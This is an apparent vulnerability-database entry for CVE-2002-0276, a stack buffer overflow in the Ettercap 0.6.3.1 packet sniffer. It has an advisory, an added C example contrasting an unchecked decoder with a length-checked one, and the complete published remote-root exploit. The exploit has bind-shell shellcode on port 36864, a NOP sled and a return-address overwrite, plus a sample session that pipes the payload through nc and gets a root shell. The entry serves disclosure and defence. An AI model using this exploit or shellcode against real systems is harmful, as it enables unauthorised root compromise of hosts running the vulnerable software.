Ettercap Large Packet Buffer Overflow Vulnerability

Vulnerability ID: 1106614    Type: Boundary Condition Error
Published: 2002-02-14    Updated: 2005-05-02
CVE: CVE-2002-0276
CNNVD-ID: CNNVD-200205-113
Platform: Linux    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/21289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-113
|Vulnerability Details
Ettercap is a multipurpose packet sniffer for Linux and BSD platforms developed by the Ettercap team. It supports creating and sending forged packets, injecting packets at every level from the network adapter up to the application, binding sniffed data to a local port, and more. Ettercap mishandles large packets, and a remote attacker can exploit this to execute arbitrary instructions on the host running Ettercap. When Ettercap receives a large packet and hands it to a protocol decoder, a buffer overflow can occur: data on the stack is overwritten, so that arbitrary instructions injected by the attacker are executed. This happens when Ettercap is bound to a network interface whose MTU is larger than the Ethernet standard (1500 bytes), or when Ettercap receives a packet carrying a forged length field. Ettercap normally runs as root, and earlier versions of Ettercap may also be affected by this vulnerability.
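The decoder pattern described above, written out as an added example rather than Ettercap's own source: an unchecked memcpy into a fixed 2000-byte stack collector next to a version that validates the length first. MAX_DATA is the value the advisory quotes; the `struct pkt` fields, `decode_checked`, `try_decode` and the 'A'-filled packet are assumptions constructed for illustration. The hardened version makes two independent checks because the advisory names two triggers: a frame that is genuinely larger than the collector (large-MTU interface) and a length field that claims more bytes than were actually captured (forged packet).

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_DATA 2000          /* collector size quoted in the advisory */

/* Hypothetical per-packet record handed to a decoder: the payload, the
 * length field parsed from the packet (attacker-controlled) and the number
 * of bytes the sniffer actually captured from the wire. */
struct pkt {
    const unsigned char *payload;
    size_t datalen;
    size_t captured;
};

/* Vulnerable pattern from the advisory: datalen is trusted, so a packet
 * larger than MAX_DATA runs past collector into the saved registers and
 * return address of this frame. Shown for contrast only; never call it
 * with datalen > MAX_DATA. */
int decode_unchecked(const struct pkt *p)
{
    unsigned char collector[MAX_DATA];

    memcpy(collector, p->payload, p->datalen);    /* no bound on datalen */
    return (int)p->datalen;
}

/* Hardened decoder: validate the length before it reaches memcpy.
 * Returns the number of bytes copied, or -1 (copying nothing) when the
 * packet must be dropped:
 *   1. datalen may not exceed what was captured (forged length field);
 *   2. datalen may not exceed the collector (oversized frame). */
int decode_checked(const struct pkt *p, unsigned char *collector, size_t collector_size)
{
    if (p->datalen > p->captured)
        return -1;                      /* length field lies about the packet */
    if (p->datalen > collector_size)
        return -1;                      /* would overrun collector */
    memcpy(collector, p->payload, p->datalen);
    return (int)p->datalen;
}

/* Build a constructed packet whose length field claims `claimed` bytes,
 * of which `captured` were really seen on the wire (filled with 'A', the
 * exploit's NOP value), and run the hardened decoder over it. */
int try_decode(size_t claimed, size_t captured)
{
    static unsigned char wire[4096];
    unsigned char collector[MAX_DATA];
    struct pkt p;

    if (captured > sizeof(wire))
        captured = sizeof(wire);
    memset(wire, 'A', sizeof(wire));
    p.payload = wire;
    p.datalen = claimed;
    p.captured = captured;
    return decode_checked(&p, collector, sizeof(collector));
}

int main(void)
{
    /* 1500-byte Ethernet frame: fits in the collector. */
    printf("1500 claimed / 1500 captured -> %d\n", try_decode(1500, 1500));
    /* 2200-byte frame on a loopback-sized MTU: larger than MAX_DATA, dropped. */
    printf("2200 claimed / 2200 captured -> %d\n", try_decode(2200, 2200));
    /* Forged length field: claims 2200 bytes, only 1514 were captured. */
    printf("2200 claimed / 1514 captured -> %d\n", try_decode(2200, 1514));
    return 0;
}
```

The exploit below sends 2200 bytes over the loopback interface, which is exactly the second case: the length is real, but it exceeds the collector, and only the size check on the collector stops it.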
|Exploit
source: http://www.securityfocus.com/bid/4104/info

Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows.

A remotely exploitable buffer overflow condition exists in Ettercap. If a large packet is received and passed to some decoders, stack data may be overwritten, leading to execution of arbitrary code. This condition may be caused by associating Ettercap with an interface with a larger MTU than ethernet, or by sending a forged packet with a misleading data length field.

Ettercap would normally be executed by the root user. Earlier versions of Ettercap may share this vulnerability.

/* 
 * ettercap-0.6.3.1 remote root xploit 
 *
 * By: Fermín J. Serna <[email protected]>
 *     Next Generation Security Technologies
 *     http://www.ngsec.com
 *
 * DESCRIPTION:
 * ============
 *
 * Several decoders (mysql, irc, ...) suffer the following problem:
 *
 *    memcpy(collector, payload, data_to_ettercap->datalen);
 *
 * collector is declared as: 
 *
 *    u_char collector[MAX_DATA];
 * 
 *  where MAX_DATA is:
 *
 *  #define MAX_DATA 2000
 *
 *  So on interfaces where MTU is higher than 2000 you can exploit 
 *  ettercap. Nop, normal ethernets have MTU:1500 ;P
 *
 *  Here are common MTU and interface types:
 * 
 *    65535 Hyperchannel
 *    17914 16 Mbit/sec token ring
 *    8166  Token Bus (IEEE 802.4)
 *    4464  4 Mbit/sec token ring (IEEE 802.5)
 *    1500  Ethernet
 *    1500  PPP (typical; can vary widely)
 *
 *  Sample exploitation could also be on loopback interfaces: MTU:16436
 *
 *  piscis:~# ettercap -NszC -i lo &
 *  [1] 21887
 *  piscis:~# ./ettercap-x 0 | nc localhost mysql
 *  ettercap-0.6.3.1 xploit by Fermín J. Serna <[email protected]>
 *  Next Generation Security Technologies
 *  http://www.ngsec.com   
 *
 *  punt!
 *  piscis:~# telnet localhost 36864
 *  Trying 127.0.0.1...
 *  Connected to localhost.
 *  Escape character is '^]'.
 *  id;
 *  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *  Madrid, 5/02/2002
 *
 */ 


#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>

#define NUM_ADDR 100          /* copies of the return address appended after the shellcode */
#define NOP 0x41              /* 'A' (inc %ecx) used as the NOP sled */
#define BUFF_SIZE 2200        /* > MAX_DATA (2000), so the decoder's memcpy overruns collector */
#define RET_ADDR 0xbfffea58   /* guessed stack address inside the sled; tune with the offset argument */
#define OFFSET 0

/* Linux/x86 bind shell; listens on TCP 36864, the port the session above connects to */
char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE+1];   /* one extra byte for the terminating NUL */
char *ch_ptr;
unsigned long *lg_ptr;      /* 4 bytes on the 32-bit x86 target this exploit is written for */
int aux;
int offset=OFFSET;

 fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <[email protected]>\n");
 fprintf(stderr,"Next Generation Security Technologies\n");
 fprintf(stderr,"http://www.ngsec.com\n\n");


 if (argc==2) offset=atoi(argv[1]);

 memset(buffer,0,sizeof(buffer));

 /* layout: [NOP sled][shellcode][NUM_ADDR x RET_ADDR] = BUFF_SIZE bytes */
 ch_ptr=buffer;
 memset(ch_ptr,NOP,BUFF_SIZE-strlen(shellcode)-4*NUM_ADDR);
 ch_ptr+=BUFF_SIZE-strlen(shellcode)-4*NUM_ADDR;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 /* the trailing addresses land on the decoder's saved return address */
 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
 ch_ptr=(char *)lg_ptr;
 *ch_ptr='\0';

 /* the payload contains no NUL bytes, so %s emits all BUFF_SIZE bytes */
 printf("%s",buffer);

 return(0);

}
|References

Source: BUGTRAQ
Name: 20020213 [NGSEC-2002-1] Ettercap, remote root compromise
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101370874219511&w=2
Source: ettercap.sourceforge.net
Link: http://ettercap.sourceforge.net/index.php?s=history
Source: BID
Name: 4104
Link: http://www.securityfocus.com/bid/4104
Source: XF
Name: ettercap-memcpy-bo(8200)
Link: http://www.iss.net/security_center/static/8200.php